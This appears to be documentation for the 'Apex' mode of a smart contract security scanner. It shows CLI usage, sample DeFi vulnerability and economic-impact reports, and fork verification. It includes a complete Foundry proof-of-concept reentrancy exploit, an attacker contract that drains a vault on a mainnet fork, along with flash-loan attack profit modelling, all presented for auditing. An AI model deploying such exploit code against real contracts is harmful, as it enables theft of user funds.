Agnech
CLI Mode

Apex Mode

The pinnacle of blockchain security analysis. All Ultimate mode features plus exploit proof generation, economic attack modeling, and fork-verified findings.

Zero False Positives

Every finding in Apex mode includes a working exploit proof verified against a forked network. If we report it, it's exploitable.

Overview

Apex mode is Bloodhound's most sophisticated analysis mode, specifically designed for blockchain and smart contract security. It combines all 7 analysis engines with blockchain-specific features like exploit generation, economic modeling, and fork-based verification.

Bash
1# Run Apex mode on smart contracts
2bloodhound scan contracts/ --mode apex
3

4# Apex mode with specific chain
5bloodhound scan . --mode apex --chain ethereum --fork-block latest
6

7# Generate exploit proofs
8bloodhound scan . --mode apex --generate-exploits --output exploits/
9

10# Full audit with economic analysis
11bloodhound scan . --mode apex \
12  --chain arbitrum \
13  --tvl-threshold 100000 \
14  --flash-loan-analysis \
15  --mev-detection \
16  --report audit.pdf

Exploit Proof Generation

Generates working Foundry test cases that prove exploitability

Flash Loan Simulation

Models flash loan attack vectors with profit calculations

MEV Analysis

Identifies maximum extractable value opportunities

Cross-Contract Analysis

Traces vulnerabilities across contract interactions

Blockchain Focus

Apex mode includes deep support for multiple blockchain ecosystems with chain-specific vulnerability patterns.

ChainStatusLanguageTVL Coverage
EthereumFullSolidity/Vyper$45B
ArbitrumFullSolidity$8.5B
OptimismFullSolidity$5.2B
SolanaFullRust$4.2B
PolygonFullSolidity$4.1B
BSCFullSolidity$3.8B
AvalancheFullSolidity$2.1B
SuiBetaMove$680M

Exploit Generation

Apex mode generates working exploit code that proves vulnerabilities are real and exploitable. Each exploit is a complete Foundry test case.

Solidity
1// Generated exploit proof for reentrancy vulnerability
2// File: exploit-proofs/Reentrancy_VulnerableVault_001.t.sol
3

4// SPDX-License-Identifier: MIT
5pragma solidity ^0.8.19;
6

7import "forge-std/Test.sol";
8

9interface IVulnerableVault {
10    function deposit() external payable;
11    function withdraw(uint256 amount) external;
12    function balanceOf(address) external view returns (uint256);
13}
14

15contract ReentrancyExploit is Test {
16    IVulnerableVault vault;
17    Attacker attacker;
18

19    function setUp() public {
20        // Fork mainnet at the vulnerable block
21        vm.createSelectFork("mainnet", 18500000);
22

23        vault = IVulnerableVault(0x1234...);  // Target contract
24        attacker = new Attacker(address(vault));
25

26        // Fund the attacker
27        vm.deal(address(attacker), 1 ether);
28    }
29

30    function testExploit() public {
31        uint256 vaultBalance = address(vault).balance;
32        console.log("Vault balance before:", vaultBalance / 1e18, "ETH");
33

34        // Execute the attack
35        attacker.attack{value: 1 ether}();
36

37        uint256 profit = address(attacker).balance - 1 ether;
38        console.log("Attacker profit:", profit / 1e18, "ETH");
39

40        // Verify the exploit succeeded
41        assertGt(profit, 0, "Exploit should be profitable");
42        assertLt(address(vault).balance, vaultBalance, "Vault should be drained");
43    }
44}
45

46contract Attacker {
47    IVulnerableVault vault;
48    uint256 attackCount;
49

50    constructor(address _vault) {
51        vault = IVulnerableVault(_vault);
52    }
53

54    function attack() external payable {
55        vault.deposit{value: msg.value}();
56        vault.withdraw(msg.value);
57    }
58

59    receive() external payable {
60        if (address(vault).balance >= 1 ether && attackCount < 10) {
61            attackCount++;
62            vault.withdraw(1 ether);
63        }
64    }
65}
66

67// ═══════════════════════════════════════════════════════════════
68// EXPLOIT SUMMARY
69// ═══════════════════════════════════════════════════════════════
70// Target:     VulnerableVault (0x1234...)
71// Chain:      Ethereum Mainnet
72// Block:      18500000
73//
74// Attack Vector:  Reentrancy via withdraw()
75// Root Cause:     State update after external call
76//
77// Impact:
78//   - Potential Loss: 147.3 ETH ($442,000 at current prices)
79//   - Exploitability: TRIVIAL (no special conditions)
80//   - Required Capital: 1 ETH
81//   - ROI: 14,730%
82//
83// To verify:
84//   forge test --match-test testExploit -vvv --fork-url $ETH_RPC
85// ═══════════════════════════════════════════════════════════════

Responsible Disclosure

Exploit proofs are generated for security testing only. Sharing or using exploits against contracts you don't own may be illegal.

DeFi Analysis

Apex mode understands DeFi primitives and can identify vulnerabilities specific to lending protocols, AMMs, yield aggregators, and more.

Bash
1# DeFi-specific vulnerability detection
2bloodhound scan contracts/ --mode apex --defi-analysis
3

4# Analysis includes:
5#
6# ┌──────────────────────────────────────────────────────────────┐
7# │ DeFi Protocol Analysis                                       │
8# ├──────────────────────────────────────────────────────────────┤
9# │ Protocol Type: Lending                                       │
10# │ TVL Estimate: $12.5M                                         │
11# │ Oracle: Chainlink (LINK/USD, ETH/USD)                        │
12# │ Flash Loan Enabled: Yes (Aave v3)                            │
13# ├──────────────────────────────────────────────────────────────┤
14# │ VULNERABILITIES FOUND                                        │
15# │                                                              │
16# │ [CRITICAL] Oracle Manipulation Vector                        │
17# │ File: contracts/PriceOracle.sol:89                           │
18# │ Issue: Spot price used without TWAP                          │
19# │ Impact: $3.2M drainable via flash loan                       │
20# │ Exploit: Generated (see exploits/oracle_001.t.sol)           │
21# │                                                              │
22# │ [HIGH] Liquidation Race Condition                            │
23# │ File: contracts/LendingPool.sol:234                          │
24# │ Issue: No MEV protection on liquidations                     │
25# │ Impact: ~$50K/month MEV extraction                           │
26# │                                                              │
27# │ [MEDIUM] Rounding Error in Interest Calculation              │
28# │ File: contracts/InterestModel.sol:67                         │
29# │ Issue: Integer division before multiplication                │
30# │ Impact: $0.001/tx loss, compounding over time                │
31# └──────────────────────────────────────────────────────────────┘

Supported DeFi Patterns

  • • AMM / DEX (Uniswap, Curve, Balancer)
  • • Lending (Aave, Compound, Maker)
  • • Yield Aggregators (Yearn, Convex)
  • • Liquid Staking (Lido, Rocket Pool)
  • • Perpetuals (GMX, dYdX)
  • • Bridges (LayerZero, Wormhole)

DeFi Vulnerability Classes

  • • Price Oracle Manipulation
  • • Flash Loan Attack Vectors
  • • Sandwich Attack Exposure
  • • Governance Manipulation
  • • Liquidity Pool Drain
  • • Interest Rate Manipulation

Economic Modeling

Apex mode calculates the potential financial impact of vulnerabilities, including attack profitability and capital requirements.

Bash
1# Economic impact analysis
2bloodhound scan . --mode apex --economic-model
3

4# Output:
5# ┌──────────────────────────────────────────────────────────────┐
6# │ ECONOMIC IMPACT ANALYSIS                                     │
7# ├──────────────────────────────────────────────────────────────┤
8# │                                                              │
9# │ Vulnerability: Oracle Manipulation in PriceOracle.sol        │
10# │                                                              │
11# │ ATTACK ECONOMICS                                             │
12# │ ├── Capital Required: 10,000 USDC (flash loan available)     │
13# │ ├── Gas Cost: ~$50 (at 30 gwei)                              │
14# │ ├── Flash Loan Fee: $30 (0.3%)                               │
15# │ ├── Slippage Estimate: $200                                  │
16# │ └── Total Cost: ~$280                                        │
17# │                                                              │
18# │ POTENTIAL PROFIT                                             │
19# │ ├── Exploitable TVL: $3,200,000                              │
20# │ ├── Extraction Rate: 85%                                     │
21# │ ├── Gross Profit: $2,720,000                                 │
22# │ └── Net Profit: $2,719,720                                   │
23# │                                                              │
24# │ RISK FACTORS                                                 │
25# │ ├── Mempool Visibility: HIGH (can be frontrun)               │
26# │ ├── Flashbots Required: YES (for private transaction)        │
27# │ └── Time Window: ~12 seconds (1 block)                       │
28# │                                                              │
29# │ CONCLUSION: Highly profitable attack with minimal capital    │
30# │ Risk Score: 98/100 (Critical)                                │
31# └──────────────────────────────────────────────────────────────┘

Fork Testing

All Apex mode findings are verified against a forked network to ensure they work with real contract state and dependencies.

Bash
1# Fork testing configuration
2bloodhound scan . --mode apex \
3  --fork-url $ETH_RPC_URL \
4  --fork-block 18500000 \
5  --verify-exploits
6

7# Fork test output:
8# ┌──────────────────────────────────────────────────────────────┐
9# │ FORK VERIFICATION                                            │
10# ├──────────────────────────────────────────────────────────────┤
11# │ RPC: https://eth-mainnet.g.alchemy.com/v2/***                │
12# │ Block: 18500000                                              │
13# │ Chain ID: 1                                                  │
14# │ Timestamp: 2024-01-15 14:32:00 UTC                           │
15# ├──────────────────────────────────────────────────────────────┤
16# │ EXPLOIT VERIFICATION                                         │
17# │                                                              │
18# │ ✓ Reentrancy_001.t.sol     PASSED  (profit: 147.3 ETH)       │
19# │ ✓ OracleManip_001.t.sol    PASSED  (profit: $3.2M)           │
20# │ ✓ FlashLoan_001.t.sol      PASSED  (profit: $890K)           │
21# │ ✗ AccessControl_001.t.sol  FAILED  (owner renounced)         │
22# │                                                              │
23# │ Result: 3/4 exploits verified                                │
24# │ False positives removed: 1                                   │
25# └──────────────────────────────────────────────────────────────┘
26

27# Custom fork settings for testing
28bloodhound scan . --mode apex \
29  --fork-url $ARBITRUM_RPC \
30  --impersonate 0x1234... \  # Test as specific address
31  --balance 1000000 \        # Give test address ETH
32  --block-time 1              # Speed up block production

RPC Requirements

Fork testing requires an archive node RPC endpoint. We recommend Alchemy or QuickNode for reliable archive access. Free tier RPCs may have rate limits.

When to Use Apex Mode

Ideal For:

  • ✓ Smart contract audits
  • ✓ Pre-deployment security review
  • ✓ Bug bounty hunting
  • ✓ DeFi protocol analysis
  • ✓ Post-incident investigation

Not Recommended For:

  • • CI/CD pipelines (too slow)
  • • Non-blockchain code
  • • Quick development checks
  • • Resource-constrained environments